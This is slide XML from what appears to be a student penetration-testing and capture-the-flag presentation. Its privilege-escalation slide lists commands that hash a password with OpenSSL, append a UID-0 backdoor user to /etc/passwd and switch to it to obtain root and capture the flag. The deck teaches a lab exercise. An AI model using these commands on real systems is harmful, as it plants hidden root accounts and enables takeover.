                <a:ea typeface="Barlow Bold" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Barlow Bold" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Objective</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2150" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7471886" y="6382822"/>
            <a:ext cx="6426875" cy="334447"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="2600"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="EEEFF5"/>
                </a:solidFill>
                <a:latin typeface="Montserrat" pitchFamily="34" charset="0"/>
                <a:ea typeface="Montserrat" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Montserrat" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Flag Capture</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="731639" y="6952417"/>
            <a:ext cx="13167122" cy="334447"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPts val="2600"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="EEEFF5"/>
                </a:solidFill>
                <a:latin typeface="Montserrat" pitchFamily="34" charset="0"/>
                <a:ea typeface="Montserrat" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Montserrat" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>The /etc/passwd file was edited to add a new root user ("raj") with a salted hash password generated using OpenSSL.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Text 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="731639" y="7522012"/>
            <a:ext cx="13167122" cy="334447"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPts val="2600"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="EEEFF5"/>
                </a:solidFill>
                <a:latin typeface="Montserrat" pitchFamily="34" charset="0"/>
                <a:ea typeface="Montserrat" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Montserrat" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Successfully logging in as the root user and capturing the flag, fulfilling the primary objective of the project.</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97F26791-91BA-49BC-D495-ECE9FE0A0217}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="824686" y="922616"/>
            <a:ext cx="10459264" cy="706517"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF">
              <a:alpha val="4000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A899863B-8412-863C-8D08-56C0DF3FEC93}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1071503" y="1078349"/>
            <a:ext cx="3656116" cy="395049"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="non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Objective</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{11DAAB88-7563-D12F-5BD7-616813353362}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4768037" y="1078349"/>
            <a:ext cx="3656116" cy="395049"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="non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Actions</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{759AF77F-F4B8-F57A-5987-64D0ED5C2689}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1071503" y="1784866"/>
            <a:ext cx="3656116" cy="395049"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="non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Privilege Escalation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{80E5CCA7-1876-0468-C78D-D6220F6F92BB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4768036" y="1784866"/>
            <a:ext cx="6671691" cy="1975247"/>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The /etc/passwd file was edited to add a new root user (“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="EEEFF5"/>
                </a:solidFill>
                <a:latin typeface="Montserrat" pitchFamily="34" charset="0"/>
                <a:ea typeface="Montserrat" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Montserrat" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>userr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="EEEFF5"/>
                </a:solidFill>
                <a:latin typeface="Montserrat" pitchFamily="34" charset="0"/>
                <a:ea typeface="Montserrat" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Montserrat" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>") with a salted hash password generated using OpenSSL.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE979929-4C53-3650-BB63-33FF3BD55F6B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="532013" y="5447639"/>
            <a:ext cx="12128164" cy="1751846"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7CD10AAD-AF29-E287-DBFC-1100ED7DDBC1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1070019" y="3364521"/>
            <a:ext cx="7315200" cy="1664430"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" marR="0" lvl="0" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"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openssl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"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passwd -1 -salt </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"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userr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"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1111</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" marR="0" lvl="0" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"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echo '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"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userr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"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:$1$userr$f2Pmre5QK/Da.Kjkz8ign/:0:0::/root:/bin/bash' &gt;&gt; /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"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etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"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/passwd</a:t>
            </a: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su</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"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b="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userr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"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 root</a:t>
            </a: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1111 		# password for user</a:t>
            </a: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524928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2D4C0352-3808-A58C-C37E-CFB7AC4238AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="798829" y="875826"/>
            <a:ext cx="9384863" cy="2454071"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 4184"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="15240">
            <a:solidFill>
              <a:srgbClr val="FFFFFF">
                <a:alpha val="24000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Shape 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE17406D-B70C-EEDA-B441-017BEF7541B5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="814069" y="891067"/>
            <a:ext cx="9384863" cy="607782"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF">
              <a:alpha val="4000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D04F4A96-4440-096E-228C-4519998776C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1060885" y="1046799"/>
            <a:ext cx="3195280" cy="339841"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="non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Objective</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A5248DED-7A1A-CD75-7AA6-BF4AA6A80C4C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4757419" y="1046799"/>
            <a:ext cx="3195280" cy="339841"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="non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Actions</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{08C0DC9E-03C0-7445-806B-053A252D6FF7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1060885" y="1753316"/>
            <a:ext cx="3195280" cy="339841"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPts val="3100"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{78E6B6B8-AE55-7C54-682A-652B5CD1E036}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4757419" y="1753316"/>
            <a:ext cx="3195280" cy="1699209"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPts val="3100"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Shape 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{55BCDCA9-EA98-6D2F-A98C-9AEE756348D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="798829" y="1618219"/>
            <a:ext cx="9384863" cy="1785381"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF">
              <a:alpha val="4000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Text 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{32DC24C2-FCD7-3F7E-117F-D8CFC1AF87B5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1045645" y="1718390"/>
            <a:ext cx="3195280" cy="339841"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="non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Flag Capture</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F2B3970E-2C6D-3567-AC95-BB5FB22F534D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4742179" y="1718390"/>
            <a:ext cx="5146042" cy="1699209"/>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Successfully logging in as the root user and capturing the flag, fulfilling the primary objective of the project.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 11" descr="A screen shot of a computer screen&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{66BB8662-39D5-2EC0-B643-29D5397D0CBA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2501900" y="3548805"/>
            <a:ext cx="8572500" cy="4439199"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2421958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140863"/>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9998FF"/>
                </a:solidFill>
                <a:latin typeface="Barlow Bold" pitchFamily="34" charset="0"/>
                <a:ea typeface="Barlow Bold" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Barlow Bold" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Conclusion</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="5100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="864037" y="3323273"/>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This penetration testing project showcases the systematic approach employed in cybersecurity to identify vulnerabilities, exploit them, and achieve a predetermined objective. The process emphasizes the importance of reconnaissance, weaponization, delivery, exploitation, installation, and command and control for effective penetration testing.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1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338387"/>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9998FF"/>
                </a:solidFill>
                <a:latin typeface="Barlow Bold" pitchFamily="34" charset="0"/>
                <a:ea typeface="Barlow Bold" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Barlow Bold" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Key Takeaways</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="5100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6350437" y="3520797"/>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This project highlighted the significance of utilizing the appropriate tools for each stage of the penetration testing process. Understanding how to properly leverage these tools and techniques is crucial for gaining control over a target system. The experience serves as a valuable learning opportunity for aspiring cybersecurity professionals.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D6C33A8E-6E7A-2950-4456-893DAD13F0C5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="704255" y="1126570"/>
            <a:ext cx="526256" cy="526256"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 40000"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="282C32"/>
          </a:solidFill>
          <a:ln/>
          <a:effectLst>
            <a:outerShdw blurRad="58420" dist="29210" dir="13500000" algn="bl" rotWithShape="0">
              <a:srgbClr val="FFFFFF">
                <a:alpha val="10000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{997A1B83-D775-5AD5-9106-50D7C88ACC6F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="902018" y="1205032"/>
            <a:ext cx="130731" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:lnSpc>
                <a:spcPts val="2900"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="EEEFF5"/>
                </a:solidFill>
                <a:latin typeface="Barlow Bold" pitchFamily="34" charset="0"/>
                <a:ea typeface="Barlow Bold" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Barlow Bold" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CFBB152F-C956-1A50-4B51-DD040E75E418}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1464350" y="1126570"/>
            <a:ext cx="3077528" cy="384691"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPts val="3000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="EEEFF5"/>
                </a:solidFill>
                <a:latin typeface="Barlow Bold" pitchFamily="34" charset="0"/>
                <a:ea typeface="Barlow Bold" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Barlow Bold" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Network Scanning</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8CF41CC2-8CF6-2027-3C1A-106EC936FF9B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1464350" y="1651516"/>
            <a:ext cx="6746796" cy="748189"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
